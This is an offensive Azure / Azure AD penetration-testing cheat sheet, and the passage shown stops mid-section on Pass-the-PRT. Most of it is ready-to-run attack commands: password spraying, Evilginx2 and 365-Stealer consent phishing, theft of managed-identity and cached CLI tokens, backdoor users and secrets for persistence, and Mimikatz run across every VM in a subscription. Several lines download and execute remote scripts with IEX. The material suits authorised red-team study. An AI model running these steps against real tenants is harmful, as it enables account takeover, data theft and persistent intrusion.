[Workshop:Breaching The Cloud Perimeter w/ Beau Bullock](https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/)
[Microsoft Penetration Testing](https://docs.microsoft.com/en-us/azure/security/fundamentals/pen-testing)
[Penetration Testing Rules of Engagement](https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement?rtc=3)
## Current Bug Bounties
[Azure SSRF Research Challenge](https://www.microsoft.com/en-us/msrc/azure-ssrf-research-challenge)
## Commando VM
Repo Location: [Commando VM](https://github.com/fireeye/commando-vm)
Post Commando Tools to install: [Connect to all Microsoft 365 services in a single PowerShell window](https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-all-microsoft-365-services-in-a-single-windows-powershell-window?view=o365-worldwide)
## Summary
* [Azure Recon Tools](#azure-recon-tools)
* [Enumeration](#enumeration)
* [Enumerate valid emails](#enumerate-valid-emails)
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
* [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell)
* [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell)
* [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
* [Enumerate manually](#enumerate-manually)
* [Enumeration methodology](#enumeration-methodology)
* [Phishing with Evilginx2](#phishing-with-evilginx2)
* [Illicit Consent Grant](#illicit-consent-grant)
* [Token from Managed Identity](#token-from-managed-identity)
* [Azure API via Powershell](#azure-api-via-powershell)
* [Azure API via Python Version](#azure-api-via-python-version)
* [Get Tokens](#get-tokens)
* [Use Tokens](#use-tokens)
* [Refresh Tokens](#refresh-token)
* [Stealing Tokens](#stealing-tokens)
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications)
* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app)
* [Azure Storage Blob](#azure-storage-blob)
* [Enumerate blobs](#enumerate-blobs)
* [SAS URL](#sas-url)
* [List and download blobs](#list-and-download-blobs)
* [Runbook Automation](#runbook-automation)
* [Create a Runbook](#create-a-runbook)
* [Persistence via Automation accounts](#persistence-via-automation-accounts)
* [Virtual Machine RunCommand](#virtual-machine-runcommand)
* [KeyVault Secrets](#keyvault-secrets)
* [Pass The Certificate](#pass--the-certificate)
* [Pass The PRT](#pass-the-prt)
* [Intunes Administration](#intunes-administration)
* [Dynamic Group Membership](#dynamic-group-membership)
* [Administrative Unit](#administrative-unit)
* [Deployment Template](#deployment-template)
* [Application Proxy](#application-proxy)
* [Conditional Access](#conditional-access)
* [Azure AD](#azure-ad)
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
* [Password Spray](#password-spray)
* [Convert GUID to SID](#convert-guid-to-sid)
* [Azure AD Connect ](#azure-ad-connect)
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
* [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket)
* [References](#references)
## Azure Recon Tools
* **ROADTool**
```powershell
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
```
* **StormSpotter**
```powershell
# https://github.com/Azure/Stormspotter
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
```
* **Azure Hound**
```powershell
# https://github.com/BloodHoundAD/AzureHound
. C:\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose
# GUI access
bolt://localhost:7687
Username: neo4j
Password: BloodHound
# Cypher query example:
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
# Change object ID's to names in Bloodhound
MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
# Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/
```
* List of Microsoft portals: https://msportals.io/
* **Azucar** : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
```powershell
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName [email protected]
```
* **Azurite Explorer** and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
```powershell
git clone https://github.com/mwrlabs/Azurite.git
git clone https://github.com/FSecureLABS/Azurite
git submodule init
git submodule update
PS> Import-Module AzureRM
PS> Import-Module AzuriteExplorer.ps1
PS> Review-AzureRmSubscription
PS> Review-CustomAzureRmSubscription
```
* **MicroBurst** - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
```powershell
$ git clone https://github.com/NetSPI/MicroBurst
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
```
* **SkyArk** - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
Require:
- Read-Only permissions over Azure Directory (Tenant)
- Read-Only permissions over Subscription
- Require AZ and AzureAD module or administrator right
```powershell
$ git clone https://github.com/cyberark/SkyArk
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Import-Module .\SkyArk.ps1 -force
PS C> Start-AzureStealth
or in the Cloud Console
PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
PS C> Scan-AzureAdmins
* **PowerZure** -
```powershell
require az module !
$ git clone https://github.com/hausec/PowerZure
$ ipmo .\PowerZure
$ Set-Subscription -Id [idgoeshere]
# Reader
$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
# Contributor
$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
$ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml"
$ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
$ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
# Owner
$ Set-Role -Role Contributor -User [email protected] -Resource Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
```
## Enumeration
### Enumerate valid emails
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Validate email
```powershell
PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com - VALID
root@<TENANT NAME>.onmicrosoft.com - INVALID
test@<TENANT NAME>.onmicrosoft.com - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
```
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
#### Password spraying
```powershell
PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
```
### Enumerate Azure Subdomains
```powershell
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
```
### Enumerate tenant with Azure AD Powershell
```powershell
Import-Module C:\Tools\AzureAD\AzureAD.psd1
Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzureAD -Credential $creds
PS AzureAD> Get-AzureADUser -All $true
PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName
PS AzureAD> Get-AzureADGroup -All $true
PS AzureAD> Get-AzureADDevice
PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
```
### Enumerate tenant with Az Powershell
```powershell
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential ("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzAccount -Credential $creds
PS Az> Get-AzResource
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
PS Az> Get-AzVM | fl
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault
```
### Enumerate tenant with az cli
```powershell
PS> az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list
```
### Enumerate manually
* Federation with Azure AD or O365
```powershell
https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
```
* Get the Tenant ID
```powershell
https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
```
## Enumeration methodology
```powershell
# Check Azure Joined
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
# Enumerate resources
PS Az> Get-AzResource
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>`
# Get info on a role
PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get info user
PS AzureAD> Get-AzureADUser -ObjectId <ID>
PS AzureAD> Get-AzureADUser -ObjectId test@<TENANT NAME>.onmicrosoft.com | fl *
# List all groups
PS AzureAD> Get-AzureADGroup -All $true
# Get members of a group
PS Az> Get-AzADGroup -DisplayName '<GROUP-NAME>'
PS Az> Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
# Get Azure AD information
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
PS AADInternals> Get-AADIntLoginInformation -UserName admin@<TENANT NAME>.onmicrosoft.com
PS AADInternals> Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com # Get Tenant ID
PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> # Get all the information
# Check if there is a user logged-in to az cli
PS> az ad signed-in-user show
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Get all details about an application
PS AzureAD> Get-AzureADApplication -ObjectId <ID> | fl *
# List all VM's the user has access to
PS Az> Get-AzVM
PS Az> Get-AzVM | fl
# Get all function apps
PS Az> Get-AzFunctionApp
# Get all webapps
PS Az> Get-AzWebApp
PS Az> Get-AzWebApp | select-object Name, Type, Hostnames
# List all storage accounts
PS Az> Get-AzStorageAccount
PS Az> Get-AzStorageAccount | fl
# List all keyvaults
PS Az> Get-AzKeyVault
```
## Phishing with Evilginx2
```powershell
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
: config domain username.corp
: config ip 10.10.10.10
: phishlets hostname o365 login.username.corp
: phishlets get-hosts o365
Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine
# copy certificate and enable the phishing
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
: phishlets enable o365
# get the phishing URL
: lures create o365
: lures get-url 0
```
## Illicit Consent Grant
> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to.
Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole`
* **Disable user consent** : Users cannot grant permissions to applications.
* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant
* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent,
* **Custom app consent policy**
### Register Application
1. Login to https://portal.azure.com > Azure Active Directory
2. Click on **App registrations** > **New registration**
3. Enter the Name for our application
4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"**
5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://<DOMAIN/IP>:<PORT>/login/authorized`.
6. Click **Register** and save the **Application ID**
### Configure Application
1. Click on `Certificates & secrets`
2. Click on `New client secret` then enter the **Description** and click on **Add**.
3. Save the **secret**'s value.
4. Click on API permissions > Add a permission
5. Click on Microsoft Graph > **Delegated permissions**
6. Search and select the below mentioned permissions and click on Add permission
* Contacts.Read
* Mail.Read / Mail.ReadWrite
* Mail.Send
* Notes.Read.All
* Mailboxsettings.ReadWrite
* Files.ReadWrite.All
* User.ReadBasic.All
* User.Read
### Setup 365-Stealer
:warning: Default port for 365-Stealer phishing is 443
- Run XAMPP and start Apache
- Clone 365-Stealer into `C:\xampp\htdocs\`
* `git clone https://github.com/AlteredSecurity/365-Stealer.git`
- Install the requirements
* Python3
* PHP CLI or Xampp server
* `pip install -r requirements.txt`
- Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache
- Edit `C:/xampp/htdocs/yourvictims/index.php` if needed
- Disable IP whitelisting `$enableIpWhiteList = false;`
- Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims)
- **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered.
- **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created.
- **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https://<Domain/IP>/login/authorized`
- **Macros Location**: Path of macro file that we want to inject.
- **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc.
- **Delay**: Delay the request by specifying time in seconds while stealing
- Create a Self Signed Certificate to use HTTPS
- Run the application either click on the button or run this command : `python 365-Stealer.py --run-app`
- `--no-ssl`: disable HTTPS
- `--port`: change the default listening port
- `--token`: provide a specific token
- `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
- Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
## Token from Managed Identity
> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**.
Find IDENTITY_HEADER and IDENTITY_ENDPOINT from the environment : `env`
Most of the time, you want a token for one of these resources:
* https://storage.azure.com
* https://vault.azure.net
* https://graph.microsoft.com
* https://management.azure.com
### Azure API via Powershell
Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`.
Then query the Azure REST API to get the **subscription ID** and more .
```powershell
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
```
### Azure API via Python Version
```py
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
```
or inside a Python Function:
```py
import logging, os
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)
```
### Get Tokens
:warning: The lifetime of a Primary Refresh Token is 14 days!
```powershell
# az cli - get tokens
az account get-access-token
az account get-access-token --resource-type aad-graph
# or Az
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
# or from a managed identity using IDENTITY_HEADER and IDENTITY_ENDPOINT
```
### Use Tokens
> Tokens contain all the claims including that for MFA and Conditional Access
* Az Powershell
```powershell
PS C:\Tools> $token = 'eyJ0e..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId <ACCOUNT-ID>
# Access Token and Graph Token
PS C:\Tools> $token = 'eyJ0eX..'
PS C:\Tools> $graphaccesstoken = 'eyJ0eX..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
PS C:\Tools> Get-AzResource
# ERROR: 'this.Client.SubscriptionId' cannot be null.
# ---> The managed identity has no rights on any of the Azure resources. Switch to to GraphAPI
```
* AzureAD
```powershell
Import-Module C:\Tools\AzureAD\AzureAD.psd1
$AADToken = 'eyJ0…'
Connect-AzureAD -AadAccessToken $AADToken -TenantId <TENANT-ID> -AccountId <ACCOUNT-ID>
```
### Refresh Tokens
* https://github.com/ConstantinT/Lantern
```powershell
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename <Name> --outpfxfile <Some path>
Lantern.exe token --username <Username> --password <Password>
Lantern.exe token --refreshtoken <RefreshToken>
Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password )
```
* https://github.com/rvrsh3ll/TokenTactics
```powershell
Import-Module .\TokenTactics.psd1
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Token 0.0.1 TokenTactics
Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics
Function Forge-UserAgent 0.0.1 TokenTactics
Function Get-AzureToken 0.0.1 TokenTactics
Function Get-TenantID 0.0.1 TokenTactics
Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics
Function Parse-JWTtoken 0.0.1 TokenTactics
Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics
Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics
Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics
Function RefreshTo-GraphToken 0.0.1 TokenTactics
Function RefreshTo-MAMToken 0.0.1 TokenTactics
Function RefreshTo-MSGraphToken 0.0.1 TokenTactics
Function RefreshTo-MSManageToken 0.0.1 TokenTactics
Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics
Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics
Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics
Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics
Function RefreshTo-OutlookToken 0.0.1 TokenTactics
Function RefreshTo-SubstrateToken 0.0.1 TokenTactics
```
## Stealing Tokens
* Get-AzurePasswords
```powershell
Import-Module Microburst.psm1
Get-AzurePasswords
Get-AzurePasswords -Verbose | Out-GridView
```
### Stealing tokens from az cli
* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\<username>\.Azure`
* azureProfile.json in the same directory contains information about subscriptions.
### Stealing tokens from az powershell
* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\<username>\.Azure`
* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json**
* Users can save tokens using `Save-AzContext`
## Add credentials to all Enterprise Applications
```powershell
# Add secrets
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
# Use secrets to authenticate as Service Principal
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
```
## Spawn SSH for Azure Web App
```powershell
az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
```
## Azure Storage Blob
* Blobs - `*.blob.core.windows.net`
* File Services - `*.file.core.windows.net`
* Data Tables - `*.table.core.windows.net`
* Queues - `*.queue.core.windows.net`
### Enumerate blobs
```powershell
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
Found Storage Account - testsecure.blob.core.windows.net
Found Storage Account - securetest.blob.core.windows.net
Found Storage Account - securedata.blob.core.windows.net
Found Storage Account - securefiles.blob.core.windows.net
```
### SAS URL
* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/)
* Click on **Open Connect Dialog** in the left menu.
* Select **Blob container**.
* On the **Select Authentication Method** page
* Select **Shared access signature (SAS)** and click on Next
* Copy the URL in **Blob container SAS URL** field.
:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files.
### List and download blobs
```powershell
PS Az> Get-AzResource
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob
```
## Runbook Automation
### Create a Runbook
```powershell
# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group
az ad signed-in-user list-owned-objects
# If the user is not part of an "Automation" group.
# Add him to a custom group , e.g: "Automation Admins"
Add-AzureADGroupMember -ObjectId <OBJID> -RefObjectId <REFOBJID> -Verbose
# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
# Create a Powershell Runbook
PS C:\Tools> Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
```
### Persistence via Automation accounts
* Create a new Automation Account
* "Create Azure Run As account": Yes
* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
* Sample runbook for this Blog located here – https://github.com/NetSPI/MicroBurst
* Publish the runbook
* Add a webhook to the runbook
* Add the AzureAD module to the Automation account
* Update the Azure Automation Modules
* Assign "User Administrator" and "Subscription Owner" rights to the automation account
* Eventually lose your access…
* Trigger the webhook with a post request to create the new user
```powershell
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
```
## Virtual Machine RunCommand
Requirements:
* `Microsoft.Compute/virtualMachines/runCommand/action`
```powershell
# Get Public IP of VM : query the network interface
PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
# Execute Powershell script on the VM
PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
# Connect via WinRM
PS C:\Tools> $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
PS C:\Tools> $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
PS C:\Tools> Enter-PSSession $sess
```
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
```powershell
# List available VMs
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
TESTRESOURCES Remote-Test
# Execute Powershell script on the VM
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
```
Against the whole subscription using MicroBurst.ps1
```powershell
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
## KeyVault Secrets
```powershell
# keyvault access token
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
# connect
PS> $token = 'eyJ0..'
PS> $keyvaulttoken = 'eyJ0..'
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
# query the vault and the secrets
PS Az> Get-AzKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
```
## Pass The PRT
> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on).
```powershell
# Run mimikatz to obtain the PRT
PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
# Copy the PRT and KeyValue
Mimikatz> privilege::debug
Mimikatz> token::elevate
Mimikatz> dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect
# Copy the Context, ClearKey and DerivedKey
